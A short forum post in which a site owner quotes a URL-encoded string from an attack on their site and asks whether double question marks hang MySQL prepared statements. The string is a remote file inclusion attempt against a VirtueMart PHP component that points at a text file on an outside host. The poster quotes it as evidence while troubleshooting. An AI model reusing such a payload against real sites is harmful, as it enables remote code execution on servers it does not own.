I recently had an attack on my site and the attacker tried to alter one of my SQL statements, by adding the following string
%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt
to a value.
Anyways, I don't use PHP or whatever this happened to be, but, the %3f%3f caused a problem: in MySQL prepare statement call, the double ?s hang.
Anyone else ran into this issue with double ?s before? I checked MySQL site and didn't find anything.